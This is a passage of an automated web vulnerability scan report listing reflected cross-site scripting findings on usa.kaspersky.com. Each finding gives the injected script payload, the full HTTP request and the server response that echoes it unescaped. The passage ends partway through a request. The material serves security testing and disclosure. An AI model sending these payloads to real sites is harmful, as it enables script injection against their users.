Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139281"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:28:11 GMT
X-Varnish: 1163059373
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.188. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2a7"><script>alert(1)</script>deb52bb8ed4 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139400"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:30:12 GMT
X-Varnish: 1163062565
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.189. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44d98"-alert(1)-"3bfb65bc033 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139441"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:30:52 GMT
X-Varnish: 1163063693
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.190. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05ea"-alert(1)-"447b63679fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/default/files/f05ea"-alert(1)-"447b63679fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138942"
Content-Type: text/html; charset=utf-8
Content-Length: 37849
Date: Sun, 04 Sep 2011 12:22:27 GMT
X-Varnish: 1163050194
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/f05ea"-alert(1)-"447b63679fe";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.191. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6348"><script>alert(1)</script>ef3152fde57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/d6348"><script>alert(1)</script>ef3152fde57 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138930"
Content-Type: text/html; charset=utf-8
Content-Length: 35264
Date: Sun, 04 Sep 2011 12:22:14 GMT
X-Varnish: 1163049785
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/d6348"><script>alert(1)</script>ef3152fde57" />
...[SNIP]...

1.192. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77e65"-alert(1)-"1a4299fe725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites77e65"-alert(1)-"1a4299fe725/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:31:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139468"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:31:19 GMT
X-Varnish: 1163064351
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites77e65"-alert(1)-"1a4299fe725/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.193. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50668"><script>alert(1)</script>7026b070ce2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites50668"><script>alert(1)</script>7026b070ce2/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139434"
Content-Type: text/html; charset=utf-8
Content-Length: 29730
Date: Sun, 04 Sep 2011 12:30:54 GMT
X-Varnish: 1163063513
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites50668"><script>alert(1)</script>7026b070ce2/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.194. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a958e"><script>alert(1)</script>d6121ecfb71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.coma958e"><script>alert(1)</script>d6121ecfb71/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139573"
Content-Type: text/html; charset=utf-8
Content-Length: 29730
Date: Sun, 04 Sep 2011 12:32:57 GMT
X-Varnish: 1163067273
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.coma958e"><script>alert(1)</script>d6121ecfb71/files/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.195. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc9f8"-alert(1)-"8fb20bcae2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.combc9f8"-alert(1)-"8fb20bcae2c/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:33:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139617"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:33:45 GMT
X-Varnish: 1163068443
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.combc9f8"-alert(1)-"8fb20bcae2c/files/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.196. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a76"><script>alert(1)</script>728f084259e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files72a76"><script>alert(1)</script>728f084259e/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139718"
Content-Type: text/html; charset=utf-8
Content-Length: 29729
Date: Sun, 04 Sep 2011 12:35:27 GMT
X-Varnish: 1163070948
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files72a76"><script>alert(1)</script>728f084259e/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.197. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fa3"-alert(1)-"d3bc9293f2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesd0fa3"-alert(1)-"d3bc9293f2f/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139745"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:35:55 GMT
X-Varnish: 1163071597
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd0fa3"-alert(1)-"d3bc9293f2f/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.198. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c98"><script>alert(1)</script>740b9641b5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/204x50_product_6.jpg15c98"><script>alert(1)</script>740b9641b5a?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
